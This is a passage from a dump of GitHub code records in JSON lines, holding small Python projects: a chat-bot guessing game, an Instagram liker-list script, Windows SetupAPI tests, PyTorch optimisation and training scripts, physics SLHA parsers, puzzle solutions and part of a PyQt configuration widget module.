len(cmd) == 3 and cmd[0] == \"猜数字\" and RepresentsInt(cmd[1]) and RepresentsInt(cmd[2]) \\\n        and int(cmd[1]) >= 0 and int(cmd[1]) < int(cmd[2]):\n        return newGame(group, int(cmd[1]), int(cmd[2]))\n    elif len(cmd) == 1 and RepresentsInt(cmd[0]):\n        res = guess(group, int(cmd[0]), member)\n        if res[0] == 1:\n            # end the game once the number is guessed\n            del guessNumberPool[group]\n        return res[1]\n    elif raw == \"帮助\":\n        return help()\n    elif raw == \"范围\" and guessNumberPool.get(group):\n        return guessNumberPool[group]\n    elif raw == \"结束\" and guessNumberPool.get(group):\n        del guessNumberPool[group]\n        return \"猜数字游戏结束\"\n    else:\n        return False","repo_name":"Zing22/GuessNumBot","sub_path":"bot/guessNumber.py","file_name":"guessNumber.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"}
{"seq_id":"71795006899","text":"import instaloader\n\nL = instaloader.Instaloader()\n\nusername = 'username'\n\nprofile_username = 'gaben_newell'\n\n\ntry:\n    L.context.log(\"Trying to login with given credentials.\")\n    L.load_session_from_file(username)\n    if L.context.is_logged_in:\n        L.context.log(\"Login successful.\")\nexcept FileNotFoundError:\n    L.context.log(\"Session file does not exist yet - Logging in.\")\n    L.context.log(\"If you don't want to login, just terminate the script.\")\n    L.context.log(\"To save the session after a successful login, press CTRL-Z\")\n    L.interactive_login(username)\n\nprofile = instaloader.Profile.from_username(L.context, profile_username)\n\nfor post in profile.get_posts():\n\n    # get only posts\n    if not post.is_video:\n\n        # get likes\n        try:\n            post_likes = post.get_likes()\n        except instaloader.exceptions.LoginRequiredException:\n            L.interactive_login(username)\n            post_likes = post.get_likes()\n\n        # Get the comments of the post\n        post_comments = post.get_comments()\n\n        # It will create a file named as profile_username.txt and write all likes to it. 
ex: if your cmd path is C:\\Users\\MyPC> then you can find your file in C:\\Users\\MyPC\\profile_username.txt\n like_count = {}\n for likee in post_likes:\n print(likee.username)\n with open(profile_username + \".txt\", \"a\") as f:\n f.write(likee.username + \"\\n\")\n","repo_name":"lordexoc/who-liked-most-instagram","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"57"} +{"seq_id":"30741006759","text":"\nimport unittest\nfrom logging import getLogger\n\nlog = getLogger()\n\nclass StructuresTestCase(unittest.TestCase):\n def test_guid_converison(self):\n from .functions import pretty_string_to_guid, guid_to_pretty_string\n from .constants import SCSIADAPTER_GUID_STRING as pretty_string\n self.assertEqual(pretty_string,\n guid_to_pretty_string(pretty_string_to_guid(pretty_string)))\n\n def test_sizes(self):\n from .structures import GUID, SP_DEVINFO_DATA, is_64bit\n self.assertEqual(GUID.min_max_sizeof().max, 16)\n self.assertEqual(SP_DEVINFO_DATA.min_max_sizeof().max, 32 if is_64bit() else 28)\n\nclass FunctionTestCase(unittest.TestCase):\n def setUp(self):\n from os import name\n if name != 'nt':\n raise unittest.SkipTest\n\n def test_SetupDiGetClassDevs(self):\n from .functions import SetupDiGetClassDevs\n from .constants import SCSIADAPTER_GUID_STRING\n result = SetupDiGetClassDevs(SCSIADAPTER_GUID_STRING)\n\n def test_SetupDiEnumDeviceInfo(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo\n devinfo_list = [info for info in SetupDiEnumDeviceInfo(SetupDiGetClassDevs())]\n self.assertGreater(len(devinfo_list), 0)\n\n def test_SetupDiGetDevicePropertyKeys(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo, SetupDiGetDevicePropertyKeys\n device_info_set = SetupDiGetClassDevs()\n dev_info_data_list = [info for info in SetupDiEnumDeviceInfo(device_info_set)]\n property_keys = SetupDiGetDevicePropertyKeys(device_info_set, dev_info_data_list[10])\n self.assertGreater(len(property_keys), 0)\n\n def test_SetupdiGetDeviceProperty__string(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo\n from .functions import SetupDiGetDevicePropertyKeys, SetupDiGetDeviceProperty\n device_info_set = SetupDiGetClassDevs()\n dev_info_data_list = [info for info in SetupDiEnumDeviceInfo(device_info_set)]\n property_keys = SetupDiGetDevicePropertyKeys(device_info_set, dev_info_data_list[10])\n property = SetupDiGetDeviceProperty(device_info_set, dev_info_data_list[10], property_keys[0])\n value = property.python_object\n\n def test_SetupdiGetDeviceProperty__all_found(self):\n from .functions import SetupDiGetClassDevs, SetupDiEnumDeviceInfo\n from .functions import SetupDiGetDevicePropertyKeys, SetupDiGetDeviceProperty\n device_info_set = SetupDiGetClassDevs()\n for devinfo in SetupDiEnumDeviceInfo(device_info_set):\n for key in SetupDiGetDevicePropertyKeys(device_info_set, devinfo):\n log.debug(key)\n property = SetupDiGetDeviceProperty(device_info_set, devinfo, key)\n value = property.python_object\n","repo_name":"Infinidat/infi.devicemanager","sub_path":"src/infi/devicemanager/setupapi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"57"} +{"seq_id":"22384618602","text":"import numpy as np\nimport numpy.linalg\nimport torch\nfrom scipy.sparse import eye, kron, vstack, diags\nfrom 
scipy.sparse.linalg import eigsh\nimport random\n\n## Initial data\n\n# Size of the full domain\nw = 32\n\n# Number of iterations\niter_num = 21\n\n# Coordinates of the centre of the domain\na = w/2\n\n# Half-length of the rectangle, which stays constant\nLongueur = 3*a/4\n\nnumpy.save(f\"donnees_init.npy\",np.array([w,iter_num,Longueur]))\n\n## Build the incidence matrix\nx = eye(w-1,w,1) - eye(w-1,w)\ny = eye(w-1,w,1) - eye(w-1,w)\nB = vstack([kron(eye(w),x),kron(y,eye(w))])\nB = torch.from_numpy(B.toarray())\n\n## Rectangle construction step\n\n# Build the initial array\ninit_table = a*torch.ones((w,w))\ny = w//2\nfor i in range(w):\n    for j in range(w):\n        if abs(j-y)<Longueur:\n            init_table[i,j]=abs(i-y)\n\n# Activation function\nsigma = lambda x : 1/(1+torch.exp(-10*x))\n\n# Build the rectangle in the domain: l is the half-width of the rectangle, and l is what we optimise.\nrect = lambda l : sigma(l-init_table)\n\n\n## Loss function\ndef loss_fun(l) :\n    # Build the Laplacian\n    BM = B @ torch.diag(rect(l).flatten().double())\n    L = - BM.t() @ BM\n\n    # retrieve the eigen-elements\n    U,S,V = torch.svd(-L)\n    S_f = S[S>1e-5]\n\n    return (4 - S_f[-2]/S_f[-1])**2 + (9 - S_f[-3]/S_f[-1])**2 + torch.max(torch.relu(-l),torch.relu(l-a))\n\n\n## Step-size search function\ndef backtracking_line_search(y,p):\n    #alpha = 1/4\n    #beta = 1/2\n    #t=1\n    #while loss_fun(y-t*p) > loss_fun(y) - alpha * t * p.norm() :\n    #    t = beta * t\n    return 1\n\n## Gradient-descent initialisation\n\n# Take l at random between 0 and the half-width of the full domain\nl=np.array(a*random.random())\nnumpy.save(f\"param_-1.npy\",l)\nl = torch.from_numpy(l)\nl.requires_grad = True\n\n# Initialise the data-logging lists\nI = []\nloss_tab = []\nPartiel1 = []\nPartiel2 = []\nfondamental = []\n\n## Descent\nfor i in range(iter_num):\n    # forward pass\n    loss = loss_fun(l)\n\n    # backward pass\n    loss.backward()\n    grad_l = l.grad\n\n    # Update the step size\n    learning_rate = backtracking_line_search(l,grad_l)\n    with torch.no_grad():\n        l -= grad_l * learning_rate\n        l.grad.zero_()\n\n    # Compute data for display\n    BM = B @ torch.diag(rect(l).flatten().double())\n    L = - BM.t() @ BM\n    U,S,V = torch.svd(-L)\n    S_f = S[S>1e-5].detach().numpy().tolist()\n    Partiel1.append(S_f[-2]/S_f[-1])\n    Partiel2.append(S_f[-3]/S_f[-1])\n    loss_tab.append(loss.detach().numpy().tolist())\n    fondamental.append(S_f[-1])\n    I.append(i)\n\n    # Save the data regularly\n    if i%10 == 0:\n        numpy.save(f\"iteration_num_{i}.npy\", np.array(I))\n        numpy.save(f\"loss_tab_num_{i}.npy\", np.array(loss_tab))\n        numpy.save(f\"partiel1_num_{i}.npy\", np.array(Partiel1))\n        numpy.save(f\"partiel2_num_{i}.npy\", np.array(Partiel2))\n        numpy.save(f\"param_{i}.npy\", l.detach().numpy())\n        numpy.save(f\"fondamental_num_{i}.npy\", np.array(fondamental))\n","repo_name":"centreborelli/stage-octaves","sub_path":"doc/opti_para/code_serveur.py","file_name":"code_serveur.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"}
{"seq_id":"31176512383","text":"#!usr/bin/env python3\r\n#-*- coding=utf-8 -*-\r\n#python=3.6 pytorch=1.2.0\r\n\r\n\r\nimport os\r\nimport random\r\nimport cv2\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn.functional as F\r\nfrom tensorboardX import SummaryWriter\r\nfrom easydict import EasyDict as edict\r\nfrom random import randint\r\nimport torchvision\r\nimport torchvision.transforms as 
transforms\r\n\r\nimport time\r\n\r\nfrom network_factory import get_network\r\nfrom opt_factory import get_opt\r\nfrom loss_factory import get_loss_func\r\nfrom datasets.loader_factory import get_loader\r\nfrom test import val\r\nfrom utils import CalculateAcc,SelfData,load_cfg,model_complexity,plot_result_data,\\\r\n load_checkpoints,print_to_screen,save_checkpoints\r\n\r\n\r\ndef fix_random_seed(cfg):\r\n random.seed(cfg.DETERMINISTIC.SEED)\r\n torch.manual_seed(cfg.DETERMINISTIC.SEED)\r\n torch.cuda.manual_seed(cfg.DETERMINISTIC.SEED)\r\n torch.backends.cudnn.deterministic = cfg.DETERMINISTIC.CUDNN\r\n np.random.seed(cfg.DETERMINISTIC.SEED)\r\n\r\n\r\ndef trainer(cfg):\r\n logger = load_cfg(cfg) \r\n fix_random_seed(cfg) \r\n \r\n train_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.DATA, 'train', label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)\r\n val_loader = get_loader(cfg.DATASET_TRPE, cfg.PATH.EVAL, 'eval',label_path=cfg.PATH.LABEL, cfg=cfg.TRAIN, logger=logger)\r\n its_num = len(train_loader)\r\n # from torchvision import models\r\n # import torch.nn as nn\r\n # class ResNet(nn.Module):\r\n # def __init__(self, pre_trained=True, n_class=200, model_choice=50):\r\n # super(ResNet, self).__init__()\r\n # self.n_class = n_class\r\n # self.base_model = self._model_choice(pre_trained, model_choice)\r\n # self.base_model.avgpool = nn.AdaptiveAvgPool2d((1,1))\r\n # self.base_model.fc = nn.Linear(512*4, n_class)\r\n # #self.base_model.fc.apply(weight_init_kaiming)\r\n\r\n # def forward(self, x):\r\n # N = x.size(0)\r\n # assert x.size() == (N, 3, 224, 224)\r\n # x = self.base_model(x)\r\n # assert x.size() == (N, self.n_class)\r\n # return x\r\n\r\n # def _model_choice(self, pre_trained, model_choice):\r\n # if model_choice == 50:\r\n # return models.resnet50(pretrained=pre_trained)\r\n # elif model_choice == 101:\r\n # return models.resnet101(pretrained=pre_trained)\r\n # elif model_choice == 152:\r\n # return models.resnet152(pretrained=pre_trained)\r\n\r\n model = get_network(cfg.MODEL.NAME, cfg=cfg.MODEL, logger=logger)\r\n model = torch.nn.DataParallel(model, cfg.GPUS).cuda() if torch.cuda.is_available() else model\r\n model_complexity(model,cfg,logger)\r\n\r\n cfg.TRAIN.LR_REDUCE = [int(its_num*x) for x in cfg.TRAIN.LR_REDUCE]\r\n opt_t,lr_scheduler_t = get_opt(model, cfg.TRAIN, logger, \r\n its_total=(cfg.TRAIN.EPOCHS-cfg.TRAIN.WARMUP)*its_num)\r\n if cfg.TRAIN.WARMUP != 0:\r\n warm_opt, warm_scheduler = get_opt(model, cfg.TRAIN, logger, \r\n is_warm=True, its_total=cfg.TRAIN.WARMUP*its_num)\r\n loss_func = get_loss_func(cfg.MODEL.LOSS, logger=logger)\r\n\r\n current_epoch = load_checkpoints(model, opt_t, cfg.PATH , logger, lr_scheduler_t)\r\n log_writter = SummaryWriter(cfg.PATH.EXPS+cfg.PATH.NAME)\r\n \r\n acc_total = []\r\n acc_val_total = []\r\n loss_total = []\r\n losss_val_total = []\r\n best_val = [0,0]\r\n \r\n for epoch in range(current_epoch, cfg.TRAIN.EPOCHS):\r\n start_time = time.time()\r\n if epoch < cfg.TRAIN.WARMUP:\r\n opt = warm_opt\r\n lr_scheduler = warm_scheduler\r\n else:\r\n opt = opt_t\r\n lr_scheduler = lr_scheduler_t\r\n\r\n acc_train_class = CalculateAcc()\r\n loss_train_calss = SelfData()\r\n model.train()\r\n data_begin = time.time()\r\n for its, (imgs, targets)in enumerate(train_loader):\r\n data_time = time.time()-data_begin\r\n imgs = imgs.cuda() if torch.cuda.is_available() else imgs\r\n targets = targets.cuda() if torch.cuda.is_available() else targets\r\n \r\n \r\n opt.zero_grad()\r\n outputs = model(imgs)\r\n loss = 
loss_func(outputs,targets)\r\n loss.backward()\r\n opt.step()\r\n lr_scheduler.step()\r\n \r\n loss_train_calss.add_value(loss.cpu())\r\n train_time = time.time()-(data_time+data_begin)\r\n data_begin = time.time()\r\n lr = opt.param_groups[0]['lr']\r\n mem = torch.cuda.memory_cached() / 1E9 if torch.cuda.is_available() else 0\r\n acc_train_class.add_value(outputs.cpu(), targets.cpu())\r\n if its % cfg.PRINT_FRE == 0:\r\n print_to_screen(loss, lr, its, epoch, its_num, logger, \r\n data_time,train_time,mem,acc_train_class.print_())\r\n \r\n if cfg.SHORT_TEST == True:\r\n if its == 20:\r\n break\r\n\r\n save_checkpoints(cfg.PATH.EXPS+cfg.PATH.NAME+cfg.PATH.MODEL, model, opt, epoch,lr_scheduler)\r\n acc_val, loss_val = val(val_loader, model, logger, loss_func, epoch, print_fre=cfg.PRINT_FRE,)\r\n log_writter.add_scalars(\"acc\",{'acc_train':acc_train_class.print_(),\r\n 'acc_val':acc_val,},\r\n epoch)\r\n acc_total.append(acc_train_class.print_())\r\n acc_val_total.append(acc_val)\r\n loss_total.append(loss_train_calss.avg())\r\n losss_val_total.append(loss_val)\r\n end_time = time.time()-start_time\r\n logger.info('Train Prec@1:%.4f\\t'%(acc_train_class.print_())+'Val Prec@1:%.4f\\t'%(acc_val)+'Epoch Time:%.2fmin'%(end_time/60))\r\n if best_val[0] < acc_val:\r\n best_val[0] = acc_val\r\n best_val[1] = epoch\r\n save_checkpoints(cfg.PATH.EXPS+cfg.PATH.NAME+cfg.PATH.BESTMODEL, model, opt, epoch,lr_scheduler)\r\n logger.info('BestV Prec@1:%.4f\\t'%(best_val[0])+\"Best Epoch:%d\"%(best_val[1]))\r\n\r\n plot_result_data(acc_total,acc_val_total,loss_total,\r\n losss_val_total,cfg.PATH.EXPS+cfg.PATH.NAME, cfg.TRAIN.EPOCHS)\r\n log_writter.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n from config_cub import cfg\r\n trainer(cfg) ","repo_name":"H-Liu1997/Pytorch-Networks","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6301,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"57"} +{"seq_id":"19871833046","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def longestUnivaluePath(self, root: Optional[TreeNode]) -> int:\n ans = []\n\n def find(root, prev, diameter):\n if not root:\n return 0\n\n if root.val != prev:\n find(root, root.val, 0)\n return 0\n\n left = find(root.left, root.val, diameter)\n right = find(root.right, root.val, diameter)\n\n diameter = max(left + right, diameter)\n ans.append(diameter)\n\n return max(left, right) + 1\n\n if not root:\n return 0\n find(root, root.val, 0)\n return max(ans)\n","repo_name":"codesquad-backend-study/algorithm-study","sub_path":"programmers/Hyun/week21/687.py","file_name":"687.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"9305071821","text":"\"\"\"\nA few common methods for extracting particle properties from SLHA spectrum and decay files\n\"\"\"\n__author__ = \"Pieter David <pieter.david@cern.ch>\"\n__date__ = \"2013-08-28\"\n\ndef getTotalWidthFromSLHA( slhaFileName, particle ):\n \"\"\"\n Extract the total width (in GeV) of particle from the decay table in the SLHA file\n \"\"\"\n W = 0.\n with open(slhaFileName, \"r\") as spcFile:\n for ln in spcFile:\n if \"DECAY\" in ln.upper() and particle in ln:\n tokens = ln.strip().split()\n if len(tokens) >= 3:\n W = float(tokens[2])\n return W\n\ndef getMassesFromSLHA( 
slhaFileName ):\n \"\"\"\n Collect all masses (in GeV) from a SLHA file\n\n Return: { str(pid) : mass }\n \"\"\"\n inMassBlock = False\n masses = dict()\n with open(slhaFileName, \"r\") as spcFile:\n for ln in spcFile:\n if not ln.strip().startswith(\"#\"):\n if inMassBlock:\n if ln.upper().startswith(\"BLOCK\"): ## check if the block ended\n inMassBlock = False\n else:\n tokens = ln.strip().split()\n masses[tokens[0]] = float(tokens[1])\n elif ln.strip().upper().startswith(\"BLOCK\") and ln.strip().split()[1].upper() == \"MASS\":\n inMassBlock = True\n return masses\n\ndef getParticlePropertiesAndPythia8Commands(spcFileName, partNames):\n \"\"\"\n Extract mass and width for particles in partNames from filename\n\n Returns: { str(pid) : ( mass[GeV] , tau[s] ) }, [ pythia8 tau0 commands ]\n \"\"\"\n import os.path\n slhaFileName = os.path.expandvars(spcFileName)\n try:\n from pyslha import readSLHAFile\n blocks, decays = readSLHAFile(slhaFileName)\n massesAndWidthsInGeV = dict( (part, ( blocks[\"MASS\"][int(part)] , decays[int(part)].totalwidth) ) for part in partNames )\n except:\n massesInGeV = getMassesFromSLHA(slhaFileName)\n massesAndWidthsInGeV = dict( (part, ( massesInGeV.get(part) , getTotalWidthFromSLHA(slhaFileName, part)) ) for part in partNames )\n from GaudiKernel import SystemOfUnits as units\n from GaudiKernel import PhysicalConstants as constants\n pps = dict()\n pythiaCommands = list()\n for part in partNames:\n massInGeV, widthInGeV = massesAndWidthsInGeV[part]\n pps[part] = ( massInGeV, constants.hbar_Planck / ( widthInGeV*units.GeV ) / units.second) # (mass [GeV], lifetime [s])\n pythiaCommands.append(\"%s:tau0 = %e\" % ( part , constants.hbarc / ( widthInGeV*units.GeV ) / units.mm ) ) # lifetime in mm/c\n return pps, pythiaCommands\n","repo_name":"Sally27/backup_cmtuser_full","sub_path":"Gauss_v45r9/Gen/DecFiles/scripts/SuSySLHAFunctions.py","file_name":"SuSySLHAFunctions.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"11314305515","text":"#!/usr/bin/env python3\nimport numpy as np\nimport random\n\n# B. 
Euler Problem 16: Power Digit Sum\ndef power_sum():\n\tnum=str(2**1000)\n\tblah=[]\n\tfor aa in range(0,len(num)):\n\t\tblah.append(int(num[aa]))\n\tans=sum(blah)\n\tprint(ans)\npower_sum()\n","repo_name":"dcreamer/eulerproblems","sub_path":"euler_problem_16.py","file_name":"euler_problem_16.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"1082704840","text":"from __future__ import annotations\n\nimport asyncio\nimport dataclasses\nimport logging\nimport time\nfrom dataclasses import fields\nfrom enum import IntEnum\nfrom itertools import zip_longest\nfrom typing import (Any, Callable, ClassVar, Dict, List, Optional, Tuple, Type,\n Union)\n\nimport numpy as np\nimport qtawesome as qta\nfrom ophyd import EpicsSignal, EpicsSignalRO\nfrom pcdsutils.qt.callbacks import WeakPartialMethodSlot\nfrom qtpy import QtCore, QtWidgets\nfrom qtpy.QtCore import (QPoint, QPointF, QRect, QRectF, QRegularExpression,\n QSize, Qt, QTimer)\nfrom qtpy.QtCore import Signal as QSignal\nfrom qtpy.QtGui import (QBrush, QClipboard, QColor, QGuiApplication, QPainter,\n QPaintEvent, QPen, QRegularExpressionValidator,\n QValidator)\nfrom qtpy.QtWidgets import (QCheckBox, QComboBox, QDoubleSpinBox, QInputDialog,\n QLabel, QLayout, QLineEdit, QMenu, QPushButton,\n QSizePolicy, QSpinBox, QStyle, QToolButton,\n QWidget)\n\nfrom atef import util\nfrom atef.cache import DataCache, get_signal_cache\nfrom atef.check import Comparison, EpicsValue, Equals, HappiValue, Range\nfrom atef.config import (Configuration, DeviceConfiguration,\n PreparedComparison, PreparedConfiguration,\n PreparedFile, PVConfiguration, ToolConfiguration)\nfrom atef.enums import Severity\nfrom atef.exceptions import DynamicValueError, MissingHappiDeviceError\nfrom atef.procedure import (ProcedureFile, ProcedureStep, SetValueStep,\n walk_steps)\nfrom atef.qt_helpers import (QDataclassBridge, QDataclassList, QDataclassValue,\n ThreadWorker)\nfrom atef.result import combine_results, incomplete_result\nfrom atef.tools import Ping\nfrom atef.type_hints import Number\nfrom atef.widgets.archive_viewer import get_archive_viewer\nfrom atef.widgets.core import DesignerDisplay\nfrom atef.widgets.happi import HappiDeviceComponentWidget\nfrom atef.widgets.ophyd import OphydAttributeData, OphydAttributeDataSummary\nfrom atef.widgets.utils import (BusyCursorThread, PV_validator,\n match_line_edit_text_width)\n\nlogger = logging.getLogger(__name__)\n\n\nclass StringListWithDialog(DesignerDisplay, QWidget):\n \"\"\"\n A widget used to modify the str variant of QDataclassList, tied to a\n specific dialog that helps with selection of strings.\n\n The ``item_add_request`` signal must be hooked into with the\n caller-specific dialog tool. This class may be subclassed to add this\n functionality.\n\n Parameters\n ----------\n data_list : QDataclassList\n The dataclass list to edit using this widget.\n\n allow_duplicates : bool, optional\n Allow duplicate entries in the list. 
Defaults to False.\n \"\"\"\n filename: ClassVar[str] = \"string_list_with_dialog.ui\"\n item_add_request: ClassVar[QSignal] = QSignal()\n item_edit_request: ClassVar[QSignal] = QSignal(list) # List[str]\n\n button_add: QtWidgets.QToolButton\n button_layout: QtWidgets.QVBoxLayout\n button_remove: QtWidgets.QToolButton\n list_strings: QtWidgets.QListWidget\n\n def __init__(\n self,\n data_list: QDataclassList,\n allow_duplicates: bool = False,\n *args,\n **kwargs,\n ):\n super().__init__(*args, **kwargs)\n self.data_list = data_list\n self.allow_duplicates = allow_duplicates\n self._setup_ui()\n\n def _setup_ui(self) -> None:\n starting_list = self.data_list.get()\n for starting_value in starting_list or []:\n self._add_item(starting_value, init=True)\n\n self.setContextMenuPolicy(Qt.ContextMenuPolicy.CustomContextMenu)\n self.customContextMenuRequested.connect(self._show_context_menu)\n\n # def test():\n # text, success = QtWidgets.QInputDialog.getText(\n # self, \"Device name\", \"Device name?\"\n # )\n # if success:\n # self.add_items([item for item in text.strip().split() if item])\n\n self.button_add.clicked.connect(self.item_add_request.emit)\n self.button_remove.clicked.connect(self._remove_item_request)\n\n def _edit_item_request():\n self.item_edit_request.emit(self.selected_items_text)\n\n self.list_strings.doubleClicked.connect(_edit_item_request)\n\n def _add_item(self, item: str, *, init: bool = False):\n \"\"\"\n Add an item to the QListWidget and the bridge (if init is not set).\n\n Parameters\n ----------\n item : str\n The item to add.\n\n init : bool, optional\n Whether or not this is the initial initialization of this widget.\n This will be set to True in __init__ so that we don't mutate\n the underlying dataclass. False, the default, means that we're\n adding a new dataclass to the list, which means we should\n definitely append it.\n \"\"\"\n if not init:\n if not self.allow_duplicates and item in self.data_list.get():\n return\n\n self.data_list.append(item)\n\n self.list_strings.addItem(QtWidgets.QListWidgetItem(item))\n\n def add_items(self, items: List[str]) -> None:\n \"\"\"\n Add one or more strings to the QListWidget and the bridge.\n\n Parameters\n ----------\n item : list of str\n The item(s) to add.\n \"\"\"\n for item in items:\n self._add_item(item)\n\n @property\n def selected_items_text(self) -> List[str]:\n \"\"\"\n The text of item(s) currently selected in the QListWidget.\n\n Returns\n -------\n selected : list of str\n \"\"\"\n return [item.text() for item in list(self.list_strings.selectedItems())]\n\n def _remove_item_request(self):\n \"\"\"Qt hook: user requested item removal.\"\"\"\n for item in self.list_strings.selectedItems():\n self.data_list.remove_value(item.text())\n self.list_strings.takeItem(self.list_strings.row(item))\n\n def _remove_item(self, item: str) -> None:\n \"\"\"\n Remove an item from the QListWidget and the bridge.\n\n Parameters\n ----------\n items : str\n The item to remove.\n \"\"\"\n self.data_list.remove_value(item)\n for row in range(self.list_strings.count()):\n if self.list_strings.item(row).text() == item:\n self.list_strings.takeItem(row)\n return\n\n def remove_items(self, items: List[str]) -> None:\n \"\"\"\n Remove items from the QListWidget and the bridge.\n\n Parameters\n ----------\n items : list of str\n The items to remove.\n \"\"\"\n for item in items:\n self._remove_item(item)\n\n def _edit_item(self, old: str, new: str) -> None:\n \"\"\"\n Edit an item in place in the QListWidget and the bridge.\n\n If we 
don't allow duplicates and new already exists, we\n need to remove old instead.\n\n Parameters\n ----------\n old : str\n The original item to replace\n new : str\n The new item to replace it with\n \"\"\"\n if old == new:\n return\n if not self.allow_duplicates and new in self.data_list.get():\n return self._remove_item(old)\n self.data_list.put_to_index(\n index=self.data_list.get().index(old),\n new_value=new,\n )\n for row in range(self.list_strings.count()):\n if self.list_strings.item(row).text() == old:\n self.list_strings.item(row).setText(new)\n return\n\n def edit_items(self, old_items: List[str], new_items: List[str]) -> None:\n \"\"\"\n Best-effort edit of items in place in the QListWidget and the bridge.\n\n The goal is to replace each instance of old with each instance of\n new, in order.\n \"\"\"\n # Ignore items that exist in both lists\n old_uniques = [item for item in old_items if item not in new_items]\n new_uniques = [item for item in new_items if item not in old_items]\n # Remove items from new if duplicates aren't allowed and they exist\n if not self.allow_duplicates:\n new_uniques = [\n item for item in new_uniques if item not in self.data_list.get()\n ]\n # Add, remove, edit in place as necessary\n # This will edit everything in place if the lists are equal length\n # If old_uniques is longer, we'll remove when we exhaust new_uniques\n # If new_uniques is longer, we'll add when we exhaust old_uniques\n # TODO find a way to add these at the selected index\n for old, new in zip_longest(old_uniques, new_uniques, fillvalue=None):\n if old is None:\n self._add_item(new)\n elif new is None:\n self._remove_item(old)\n else:\n self._edit_item(old, new)\n\n def _show_context_menu(self, pos: QPoint) -> None:\n \"\"\"\n Displays a context menu that provides copy & remove actions\n to the user\n\n Parameters\n ----------\n pos : QPoint\n Position to display the menu at\n \"\"\"\n if len(self.list_strings.selectedItems()) <= 0:\n return\n\n menu = QMenu(self)\n\n def copy_selected():\n items = self.list_strings.selectedItems()\n text = '\\n'.join([x.text() for x in items])\n if len(text) > 0:\n QGuiApplication.clipboard().setText(text, QClipboard.Mode.Clipboard)\n\n copy = menu.addAction('&Copy')\n copy.triggered.connect(copy_selected)\n\n remove = menu.addAction('&Remove')\n remove.triggered.connect(self._remove_item_request)\n\n menu.exec(self.mapToGlobal(pos))\n\n\nclass DeviceListWidget(StringListWithDialog):\n \"\"\"\n Device list widget, with ``HappiSearchWidget`` for adding new devices.\n \"\"\"\n\n _search_widget: Optional[HappiDeviceComponentWidget] = None\n\n def _setup_ui(self) -> None:\n super()._setup_ui()\n self.item_add_request.connect(self._open_device_chooser)\n self.item_edit_request.connect(self._open_device_chooser)\n\n def _open_device_chooser(self, to_select: Optional[List[str]] = None) -> None:\n \"\"\"\n Hook: User requested adding/editing an existing device.\n\n Parameters\n ----------\n to_select : list of str, optional\n If provided, the device chooser will filter for these items.\n \"\"\"\n self._search_widget = HappiDeviceComponentWidget(\n client=util.get_happi_client(),\n show_device_components=False,\n )\n self._search_widget.item_search_widget.happi_items_chosen.connect(\n self.add_items\n )\n self._search_widget.show()\n self._search_widget.activateWindow()\n self._search_widget.item_search_widget.edit_filter.setText(\n util.regex_for_devices(to_select)\n )\n\n\nclass ComponentListWidget(StringListWithDialog):\n \"\"\"\n Component list widget 
using a ``HappiDeviceComponentWidget``.\n \"\"\"\n\n _search_widget: Optional[HappiDeviceComponentWidget] = None\n suggest_comparison: QSignal = QSignal(Comparison)\n get_device_list: Optional[Callable[[], List[str]]]\n\n def __init__(\n self,\n data_list: QDataclassList,\n get_device_list: Optional[Callable[[], List[str]]] = None,\n allow_duplicates: bool = False,\n **kwargs,\n ):\n self.get_device_list = get_device_list\n super().__init__(data_list=data_list, allow_duplicates=allow_duplicates, **kwargs)\n\n def _setup_ui(self) -> None:\n super()._setup_ui()\n self.item_add_request.connect(self._open_component_chooser)\n self.item_edit_request.connect(self._open_component_chooser)\n\n def _open_component_chooser(self, to_select: Optional[List[str]] = None) -> None:\n \"\"\"\n Hook: User requested adding/editing a component.\n\n Parameters\n ----------\n to_select : list of str, optional\n If provided, the device chooser will filter for these items.\n \"\"\"\n\n widget = HappiDeviceComponentWidget(\n client=util.get_happi_client()\n )\n widget.device_widget.custom_menu_helper = self._attr_menu_helper\n self._search_widget = widget\n # widget.item_search_widget.happi_items_chosen.connect(\n # self.add_items\n # )\n widget.show()\n widget.activateWindow()\n\n if self.get_device_list is not None:\n try:\n device_list = self.get_device_list()\n except Exception as ex:\n device_list = []\n logger.debug(\"Failed to get device list\", exc_info=ex)\n\n widget.item_search_widget.edit_filter.setText(\n util.regex_for_devices(device_list)\n )\n\n def _attr_menu_helper(self, data: List[OphydAttributeData]) -> QtWidgets.QMenu:\n menu = QtWidgets.QMenu()\n\n summary = OphydAttributeDataSummary.from_attr_data(*data)\n short_attrs = [datum.attr.split(\".\")[-1] for datum in data]\n\n def add_attrs():\n for datum in data:\n self._add_item(datum.attr)\n\n def add_without():\n add_attrs()\n\n def add_with_equals():\n add_attrs()\n comparison = Equals(\n name=f'{\"_\".join(short_attrs)}_auto',\n description=f'Comparison from: {\", \".join(short_attrs)}',\n value=summary.average,\n )\n self.suggest_comparison.emit(comparison)\n\n def add_with_range():\n add_attrs()\n comparison = Range(\n name=f'{\"_\".join(short_attrs)}_auto',\n description=f'Comparison from: {\", \".join(short_attrs)}',\n 